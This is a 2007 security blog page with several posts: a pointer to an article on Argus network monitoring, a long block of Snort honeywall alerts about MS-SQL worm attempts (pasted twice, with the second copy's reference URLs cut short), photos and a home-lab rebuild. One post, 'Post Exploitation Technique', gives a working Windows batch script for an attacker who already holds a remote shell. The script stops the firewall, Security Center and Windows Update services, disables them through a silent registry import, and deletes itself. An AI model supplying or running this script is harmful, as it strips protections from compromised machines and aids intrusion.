This month's ISSA Journal has an interesting article by Russ McRee on NSM topics. The main topic is Argus, an excellent suite of tools for implementing distributed collection of network flow information and graphing the output using Afterglow. It also happens that he mentions NSMWiki, which is maintained for the Sguil project.
If you're not an ISSA member, you can read Russ' article here.
Friday, November 16, 2007
Friday, November 9, 2007
Post Exploitation Technique: Kill the Windows XP SP2 firewall
This registry hack assumes that you already possess a remote shell and need to kill the firewall remotely (to spawn remote shells on certain egress ports). To use, save the code below into a batch file (ie down.bat) and run on the remote computer.
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO REGEDIT4
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
May Your Skill Prevail.
Thursday, November 8, 2007
When Script Kiddies Attack!
Snort alerts from our resident Honeywall! Even though we are currently running MySQL as our flypaper there are sk's running relentless MS-SQL attempts. This is data material but I thought that it would be of nominal interest nonetheless.
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-07:35:43.418518 10.10.10.254:2456 -> 10.1.4.3:1434
UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310 ]
[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]
[Classification: Misc Attack] [Priority: 2]
08/14-07:35:43.418518 10.10.10.254:2456 -> 10.1.4.3:1434
UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310 ]
[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-07:35:43.418518 10.10.10.254:2456 -> 10.1.4.3:1434
UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404
Len: 376
[Xref => http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx][Xref
=> http://cgi.nessus.org/plugins/dump.php3?id=10674][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5310 ]
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:28:04.702026 218.232.95.60:3664 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310 ]
[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:28:04.702026 218.232.95.60:3664 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310 ]
[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-15:28:04.702026 218.232.95.60:3664 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404
Len: 376
[Xref => http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx][Xref
=> http://cgi.nessus.org/plugins/dump.php3?id=10674][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5310 ]
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:42:58.867441 202.106.102.195:1071 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310 ]
[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:42:58.867441 202.106.102.195:1071 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310 ]
[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-15:42:58.867441 202.106.102.195:1071 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404
Len: 376
[Xref => http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx][Xref
=> http://cgi.nessus.org/plugins/dump.php3?id=10674][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5310 ]
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-19:15:19.388509 221.195.73.84:1042 -> 10.1.4.3:1434
UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310 ]
[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]
[Classification: Misc Attack] [Priority: 2]
08/14-19:15:19.388509 221.195.73.84:1042 -> 10.1.4.3:1434
UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310 ]
[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-19:15:19.388509 221.195.73.84:1042 -> 10.1.4.3:1434
UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404
Len: 376
[Xref => http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx][Xref
=> http://cgi.nessus.org/plugins/dump.php3?id=10674][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5310 ]
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-07:35:43.418518 10.10.10.254:2456 -> 10.1.4.3:1434
UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]
[Classification: Misc Attack] [Priority: 2]
08/14-07:35:43.418518 10.10.10.254:2456 -> 10.1.4.3:1434
UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-07:35:43.418518 10.10.10.254:2456 -> 10.1.4.3:1434
UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404
Len: 376
[Xref => http://www.microsoft.com
=> http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:28:04.702026 218.232.95.60:3664 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:28:04.702026 218.232.95.60:3664 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-15:28:04.702026 218.232.95.60:3664 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404
Len: 376
[Xref => http://www.microsoft.com
=> http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:42:58.867441 202.106.102.195:1071 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:42:58.867441 202.106.102.195:1071 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-15:42:58.867441 202.106.102.195:1071 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404
Len: 376
[Xref => http://www.microsoft.com
=> http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-19:15:19.388509 221.195.73.84:1042 -> 10.1.4.3:1434
UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]
[Classification: Misc Attack] [Priority: 2]
08/14-19:15:19.388509 221.195.73.84:1042 -> 10.1.4.3:1434
UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-19:15:19.388509 221.195.73.84:1042 -> 10.1.4.3:1434
UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404
Len: 376
[Xref => http://www.microsoft.com
=> http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
Wednesday, November 7, 2007
BlackHat Vegas 2007 and Defcon 15 Photos
Yes, I know these events transpired ages ago. I wanted to post them here anyway in case anyone was interested in seeing why I will never have a future in photography!
View the photos here.
View the photos here.
Home/Office Lab
One of the major undertakings of this recent summer was to rebuild the IGS Lab and Research environment.
From rats nest to organization. The majority of equipment was moved off desks and tables onto a rack along with the introduction of actual cable and wiring management. Additional power was also added to deal with random (and frustrating) power losses.
View the transformation.
From rats nest to organization. The majority of equipment was moved off desks and tables onto a rack along with the introduction of actual cable and wiring management. Additional power was also added to deal with random (and frustrating) power losses.
View the transformation.
Subscribe to:
Posts (Atom)